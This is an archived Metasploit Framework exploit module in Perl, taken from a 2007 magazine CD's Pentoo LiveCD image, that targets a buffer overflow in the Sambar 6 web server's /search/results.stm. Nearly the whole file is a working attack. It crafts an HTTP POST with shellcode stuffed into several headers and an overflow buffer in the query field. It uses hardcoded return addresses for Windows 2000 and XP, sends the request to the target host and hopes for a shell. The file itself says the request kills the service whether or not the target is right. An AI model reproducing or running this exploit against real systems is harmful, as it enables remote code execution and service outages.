home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / sambar6_search_results.pm < prev    next >
Text File  |  2006-06-30  |  4KB  |  142 lines
  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::sambar6_search_results;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info =
  18.   {
  19.     'Name'    => 'Sambar 6 Search Results Buffer Overflow',
  20.     'Version' => '$Revision: 1.24 $',
  21.     'Authors' =>
  22.       [
  23.         'H D Moore <hdm [at] metasploit.com>',
  24.         'Andrew Griffiths <andrewg [at] felinemenace.org>'
  25.       ],
  26.  
  27.     'Arch'  => [ 'x86' ],
  28.     'OS'    => [ 'win32', 'win2000', 'winxp' ],
  29.     'Priv'  => 0,
  30.  
  31.     'UserOpts'  =>
  32.       {
  33.         'RHOST' => [1, 'ADDR', 'The target address'],
  34.         'RPORT' => [1, 'PORT', 'The target port', 80],
  35.         'SSL'   => [0, 'BOOL', 'Use SSL'],
  36.       },
  37.  
  38.     'Payload' =>
  39.       {
  40.         'Space'  => 2000, # yes, we have as much space as we want :)
  41.         'BadChars'  => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
  42.  
  43.         # example of allowing A-Z, a-z, 0-9, 0xc0+ only
  44.         #join("", map { $_=chr($_) } (0x00 .. 0x2f)).
  45.         #join("", map { $_=chr($_) } (0x3a .. 0x40)).
  46.         #join("", map { $_=chr($_) } (0x5B .. 0x60)).
  47.         #join("", map { $_=chr($_) } (0x7B .. 0xC0)),
  48.       },
  49.  
  50.     'Description'  => Pex::Text::Freeform(qq{
  51.         This exploits a buffer overflow found in the
  52.         /search/results.stm application that comes with Sambar 6.
  53.         This code is a direct port of Andrew Griffiths's SMUDGE
  54.         exploit, the only changes made were to the nops and payload.
  55.         This exploit causes the service to die, whether you provided
  56.         the correct target or not.
  57. }),
  58.     'Refs'  =>
  59.       [
  60.         ['OSVDB', 2204],
  61.         ['MIL', '56'],
  62.       ],
  63.  
  64.     'Targets' =>
  65.       [
  66.         ['Windows 2000', 0x74fdee63, 0x773368f4],
  67.         ['Windows XP',   0x77da78ff, 0x77e631ea],
  68.       ],
  69.  
  70.     'Keys'  => ['sambar'],
  71.  
  72.     'DisclosureDate' => 'Jun 21 2003',
  73.   };
  74.  
  75. sub new {
  76.     my $class = shift;
  77.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  78.     return($self);
  79. }
  80.  
  81. sub Exploit {
  82.     my $self = shift;
  83.     my $target_host = $self->GetVar('RHOST');
  84.     my $target_port = $self->GetVar('RPORT');
  85.     my $target_idx  = $self->GetVar('TARGET');
  86.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  87.  
  88.     my $target = $self->Targets->[$target_idx];
  89.     my ($opsys, $jmpesp, $retaddr) = @{ $target };
  90.  
  91.     $self->PrintLine("[*] Attemping to exploit Sambar with target '$opsys'");
  92.  
  93.     my $request =
  94.       "POST /search/results.stm HTTP/1.1\r\n".
  95.       "Host: $target_host:$target_port\r\n".
  96.       "User-Agent: $shellcode\r\n".
  97.       "Accept: $shellcode\r\n".
  98.       "Accept-Encoding: $shellcode\r\n".
  99.       "Accept-Language: $shellcode\r\n".
  100.       "Accept-Ranges: $shellcode\r\n".
  101.       "Referrer: $shellcode\r\n".
  102.       "Connection: Keep-Alive\r\n".
  103.       "Pragma: no-cache\r\n".
  104.       "Content-Type: $shellcode\r\n";
  105.  
  106. # we use \xfc (cld) as nop, this code goes through tolower() and must be 0xc0->0xff
  107. # int3's DO NOT WORK because it triggers an exception and causes the server to exit
  108.     my $jmpcode = "\xfc"."h". pack("V", $retaddr) . "\xfc\xfc\xfc"."\xc2\x34\xd1";
  109.     my $bigbuff = $jmpcode . ("X" x (128 - length($jmpcode))) . pack("VV", $jmpesp, $jmpesp) . $jmpcode;
  110.     my $content = "style=page&spage=0&indexname=docs&query=$bigbuff";
  111.  
  112.     $request .= "Content-Length: " . length($content) . "\r\n\r\n" . $content;
  113.  
  114.     my $s = Msf::Socket::Tcp->new
  115.       (
  116.         'PeerAddr'  => $target_host,
  117.         'PeerPort'  => $target_port,
  118.         'LocalPort' => $self->GetVar('CPORT'),
  119.         'SSL'       => $self->GetVar('SSL'),
  120.       );
  121.     if ($s->IsError) {
  122.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  123.         return;
  124.     }
  125.  
  126.     $self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
  127.     $s->Send($request);
  128.  
  129.     $self->PrintLine("[*] Waiting for a response...");
  130.     my $r = $s->Recv(-1);
  131.     if(!$r) {
  132.         $self->PrintLine("[*] Didn't get response, hoping for shell anyway");
  133.     }
  134.     else {
  135.         $self->PrintLine('[*] Got Response');
  136.     }
  137.  
  138.     sleep(2);
  139.     $s->Close();
  140. }
  141.  
  142.